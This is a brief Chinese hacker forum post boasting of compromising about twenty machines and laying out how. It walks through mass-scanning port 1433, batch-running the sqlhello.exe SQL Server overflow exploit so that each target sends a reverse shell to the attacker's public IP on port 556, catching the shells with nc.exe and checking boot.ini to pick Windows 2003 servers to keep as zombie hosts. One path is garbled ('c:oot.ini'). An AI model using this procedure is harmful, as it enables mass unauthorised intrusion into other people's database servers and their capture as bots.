SQLServer溢出獵捕肉雞新方法
我今天用這個方法拿到了近20臺肉雞。呵!!
要用到幾個工具!!
nc.exe
sqlhello.exe
代理獵手!!
先用代理獵手掃1433端口!這個大家應該會吧。玩QB的時候可以說是……呵。
掃到后整理。導出。 替換為溢出的格式!!比如我掃到了。
192.168.0.1:1433
溢出的格式就是: sqlhello.exe 192.168.0.1 1433本機IP(公網的) 556
保存為bat文件。
先在公網的機子上監聽一個端口如556
現在運行那個bat文件!
呵!!看著有沒有shell返回。
我試過不到兩分鐘就返回了一個。
這時候你先ctrl+c停下那個bat 的運行。
查看一下。那個shell的系統再說!
type c:oot.ini
如果是2003服務器版的。
呵。。
很快的就成為我們的肉雞了!